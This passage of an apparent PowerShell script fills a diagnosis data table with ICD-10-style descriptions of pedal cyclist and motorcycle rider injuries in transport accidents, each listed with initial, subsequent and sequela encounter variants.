stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with fixed or stationary object in traffic accident","Unspecified pedal cyclist injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with fixed or stationary object in traffic accident","Unspecified pedal cyclist injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in noncollision transport accident in nontraffic accident","Pedal cycle driver injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in noncollision transport accident in nontraffic accident","Pedal cycle driver injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in noncollision transport accident in nontraffic accident","Pedal cycle driver injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in noncollision transport accident in nontraffic accident","Pedal cycle passenger injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in noncollision transport accident in nontraffic accident","Pedal cycle passenger injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in noncollision transport accident in nontraffic accident","Pedal cycle passenger injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in noncollision transport accident in nontraffic accident","Unspecified pedal cyclist injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in noncollision transport accident in nontraffic accident","Unspecified pedal cyclist injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in noncollision transport accident in nontraffic accident","Unspecified pedal cyclist injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in noncollision transport accident","Person boarding or alighting a pedal cycle injured in noncollision transport accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in noncollision transport accident","Person boarding or alighting a pedal cycle injured in noncollision transport accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a pedal cycle injured in noncollision transport accident","Person boarding or alighting a pedal cycle injured in noncollision transport accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in noncollision transport accident in traffic accident","Pedal cycle driver injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in noncollision transport accident in traffic accident","Pedal cycle driver injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in noncollision transport accident in traffic accident","Pedal cycle driver injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in noncollision transport accident in traffic accident","Pedal cycle passenger injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in noncollision transport accident in traffic accident","Pedal cycle passenger injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in noncollision transport accident in traffic accident","Pedal cycle passenger injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in noncollision transport accident in traffic accident","Unspecified pedal cyclist injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in noncollision transport accident in traffic accident","Unspecified pedal cyclist injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in noncollision transport accident in traffic accident","Unspecified pedal cyclist injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with unspecified motor vehicles in nontraffic accident","Pedal cycle driver injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with unspecified motor vehicles in nontraffic accident","Pedal cycle driver injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with unspecified motor vehicles in nontraffic accident","Pedal cycle driver injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with other motor vehicles in nontraffic accident","Pedal cycle driver injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with other motor vehicles in nontraffic accident","Pedal cycle driver injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with other motor vehicles in nontraffic accident","Pedal cycle driver injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with unspecified motor vehicles in nontraffic accident","Pedal cycle passenger injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with unspecified motor vehicles in nontraffic accident","Pedal cycle passenger injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with unspecified motor vehicles in nontraffic accident","Pedal cycle passenger injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with other motor vehicles in nontraffic accident","Pedal cycle passenger injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with other motor vehicles in nontraffic accident","Pedal cycle passenger injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with other motor vehicles in nontraffic accident","Pedal cycle passenger injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified pedal cyclist injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified pedal cyclist injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified pedal cyclist injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with other motor vehicles in nontraffic accident","Unspecified pedal cyclist injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with other motor vehicles in nontraffic accident","Unspecified pedal cyclist injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with other motor vehicles in nontraffic accident","Unspecified pedal cyclist injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cyclist (driver) (passenger) injured in unspecified nontraffic accident","Pedal cyclist (driver) (passenger) injured in unspecified nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cyclist (driver) (passenger) injured in unspecified nontraffic accident","Pedal cyclist (driver) (passenger) injured in unspecified nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cyclist (driver) (passenger) injured in unspecified nontraffic accident","Pedal cyclist (driver) (passenger) injured in unspecified nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with unspecified motor vehicles in traffic accident","Pedal cycle driver injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with unspecified motor vehicles in traffic accident","Pedal cycle driver injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with unspecified motor vehicles in traffic accident","Pedal cycle driver injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with other motor vehicles in traffic accident","Pedal cycle driver injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with other motor vehicles in traffic accident","Pedal cycle driver injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with other motor vehicles in traffic accident","Pedal cycle driver injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with unspecified motor vehicles in traffic accident","Pedal cycle passenger injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with unspecified motor vehicles in traffic accident","Pedal cycle passenger injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with unspecified motor vehicles in traffic accident","Pedal cycle passenger injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with other motor vehicles in traffic accident","Pedal cycle passenger injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with other motor vehicles in traffic accident","Pedal cycle passenger injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with other motor vehicles in traffic accident","Pedal cycle passenger injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with unspecified motor vehicles in traffic accident","Unspecified pedal cyclist injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with unspecified motor vehicles in traffic accident","Unspecified pedal cyclist injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with unspecified motor vehicles in traffic accident","Unspecified pedal cyclist injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with other motor vehicles in traffic accident","Unspecified pedal cyclist injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with other motor vehicles in traffic accident","Unspecified pedal cyclist injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with other motor vehicles in traffic accident","Unspecified pedal cyclist injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cyclist (driver) (passenger) injured in transport accident with military vehicle","Pedal cyclist (driver) (passenger) injured in transport accident with military vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cyclist (driver) (passenger) injured in transport accident with military vehicle","Pedal cyclist (driver) (passenger) injured in transport accident with military vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cyclist (driver) (passenger) injured in transport accident with military vehicle","Pedal cyclist (driver) (passenger) injured in transport accident with military vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cyclist (driver) (passenger) injured in other specified transport accidents","Pedal cyclist (driver) (passenger) injured in other specified transport accidents, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cyclist (driver) (passenger) injured in other specified transport accidents","Pedal cyclist (driver) (passenger) injured in other specified transport accidents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cyclist (driver) (passenger) injured in other specified transport accidents","Pedal cyclist (driver) (passenger) injured in other specified transport accidents, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cyclist (driver) (passenger) injured in unspecified traffic accident","Pedal cyclist (driver) (passenger) injured in unspecified traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cyclist (driver) (passenger) injured in unspecified traffic accident","Pedal cyclist (driver) (passenger) injured in unspecified traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cyclist (driver) (passenger) injured in unspecified traffic accident","Pedal cyclist (driver) (passenger) injured in unspecified traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with pedestrian or animal in nontraffic accident","Motorcycle driver injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with pedestrian or animal in nontraffic accident","Motorcycle driver injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with pedestrian or animal in nontraffic accident","Motorcycle driver injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with pedestrian or animal in nontraffic accident","Motorcycle passenger injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with pedestrian or animal in nontraffic accident","Motorcycle passenger injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with pedestrian or animal in nontraffic accident","Motorcycle passenger injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with pedestrian or animal in nontraffic accident","Unspecified motorcycle rider injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with pedestrian or animal in nontraffic accident","Unspecified motorcycle rider injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with pedestrian or animal in nontraffic accident","Unspecified motorcycle rider injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with pedestrian or animal","Person boarding or alighting a motorcycle injured in collision with pedestrian or animal, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with pedestrian or animal","Person boarding or alighting a motorcycle injured in collision with pedestrian or animal, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with pedestrian or animal","Person boarding or alighting a motorcycle injured in collision with pedestrian or animal, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with pedestrian or animal in traffic accident","Motorcycle driver injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with pedestrian or animal in traffic accident","Motorcycle driver injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with pedestrian or animal in traffic accident","Motorcycle driver injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with pedestrian or animal in traffic accident","Motorcycle passenger injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with pedestrian or animal in traffic accident","Motorcycle passenger injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with pedestrian or animal in traffic accident","Motorcycle passenger injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with pedestrian or animal in traffic accident","Unspecified motorcycle rider injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with pedestrian or animal in traffic accident","Unspecified motorcycle rider injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with pedestrian or animal in traffic accident","Unspecified motorcycle rider injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with pedal cycle in nontraffic accident","Motorcycle driver injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with pedal cycle in nontraffic accident","Motorcycle driver injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with pedal cycle in nontraffic accident","Motorcycle driver injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with pedal cycle in nontraffic accident","Motorcycle passenger injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with pedal cycle in nontraffic accident","Motorcycle passenger injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with pedal cycle in nontraffic accident","Motorcycle passenger injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with pedal cycle in nontraffic accident","Unspecified motorcycle rider injured in collision with pedal cycle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with pedal cycle in nontraffic accident","Unspecified motorcycle rider injured in collision with pedal cycle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with pedal cycle in nontraffic accident","Unspecified motorcycle rider injured in collision with pedal cycle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with pedal cycle","Person boarding or alighting a motorcycle injured in collision with pedal cycle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with pedal cycle","Person boarding or alighting a motorcycle injured in collision with pedal cycle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with pedal cycle","Person boarding or alighting a motorcycle injured in collision with pedal cycle, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with pedal cycle in traffic accident","Motorcycle driver injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with pedal cycle in traffic accident","Motorcycle driver injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with pedal cycle in traffic accident","Motorcycle driver injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with pedal cycle in traffic accident","Motorcycle passenger injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with pedal cycle in traffic accident","Motorcycle passenger injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with pedal cycle in traffic accident","Motorcycle passenger injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with pedal cycle in traffic accident","Unspecified motorcycle rider injured in collision with pedal cycle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with pedal cycle in traffic accident","Unspecified motorcycle rider injured in collision with pedal cycle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with pedal cycle in traffic accident","Unspecified motorcycle rider injured in collision with pedal cycle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Motorcycle driver injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Motorcycle driver injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Motorcycle driver injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Motorcycle passenger injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Motorcycle passenger injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Motorcycle passenger injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified motorcycle rider injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified motorcycle rider injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with two- or three-wheeled motor vehicle in nontraffic accident","Unspecified motorcycle rider injured in collision with two- or three-wheeled motor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting a motorcycle injured in collision with two- or three-wheeled motor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting a motorcycle injured in collision with two- or three-wheeled motor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with two- or three-wheeled motor vehicle","Person boarding or alighting a motorcycle injured in collision with two- or three-wheeled motor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with two- or three-wheeled motor vehicle in traffic accident","Motorcycle driver injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with two- or three-wheeled motor vehicle in traffic accident","Motorcycle driver injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with two- or three-wheeled motor vehicle in traffic accident","Motorcycle driver injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with two- or three-wheeled motor vehicle in traffic accident","Motorcycle passenger injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with two- or three-wheeled motor vehicle in traffic accident","Motorcycle passenger injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with two- or three-wheeled motor vehicle in traffic accident","Motorcycle passenger injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified motorcycle rider injured in collision with two- or three-wheeled motor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified motorcycle rider injured in collision with two- or three-wheeled motor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with two- or three-wheeled motor vehicle in traffic accident","Unspecified motorcycle rider injured in collision with two- or three-wheeled motor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with car, pick-up truck or van in nontraffic accident","Motorcycle driver injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with car, pick-up truck or van in nontraffic accident","Motorcycle driver injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with car, pick-up truck or van in nontraffic accident","Motorcycle driver injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with car, pick-up truck or van in nontraffic accident","Motorcycle passenger injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with car, pick-up truck or van in nontraffic accident","Motorcycle passenger injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with car, pick-up truck or van in nontraffic accident","Motorcycle passenger injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with car, pick-up truck or van in nontraffic accident","Unspecified motorcycle rider injured in collision with car, pick-up truck or van in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with car, pick-up truck or van in nontraffic accident","Unspecified motorcycle rider injured in collision with car, pick-up truck or van in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with car, pick-up truck or van in nontraffic accident","Unspecified motorcycle rider injured in collision with car, pick-up truck or van in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with car, pick-up truck or van","Person boarding or alighting a motorcycle injured in collision with car, pick-up truck or van, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with car, pick-up truck or van","Person boarding or alighting a motorcycle injured in collision with car, pick-up truck or van, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a motorcycle injured in collision with car, pick-up truck or van","Person boarding or alighting a motorcycle injured in collision with car, pick-up truck or van, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with car, pick-up truck or van in traffic accident","Motorcycle driver injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with car, pick-up truck or van in traffic accident","Motorcycle driver injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with car, pick-up truck or van in traffic accident","Motorcycle driver injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with car, pick-up truck or van in traffic accident","Motorcycle passenger injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with car, pick-up truck or van in traffic accident","Motorcycle passenger injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with car, pick-up truck or van in traffic accident","Motorcycle passenger injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with car, pick-up truck or van in traffic accident","Unspecified motorcycle rider injured in collision with car, pick-up truck or van in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with car, pick-up truck or van in traffic accident","Unspecified motorcycle rider injured in collision with car, pick-up truck or van in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with car, pick-up truck or van in traffic accident","Unspecified motorcycle rider injured in collision with car, pick-up truck or van in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with heavy transport vehicle or bus in nontraffic accident","Motorcycle driver injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with heavy transport vehicle or bus in nontraffic accident","Motorcycle driver injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle driver injured in collision with heavy transport vehicle or bus in nontraffic accident","Motorcycle driver injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with heavy transport vehicle or bus in nontraffic accident","Motorcycle passenger injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with heavy transport vehicle or bus in nontraffic accident","Motorcycle passenger injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Motorcycle passenger injured in collision with heavy transport vehicle or bus in nontraffic accident","Motorcycle passenger injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified motorcycle rider injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified motorcycle rider injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified motorcycle rider injured in collision with heavy transport vehicle or bus in nontraffic accident","Unspecified motorcycle rider injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a 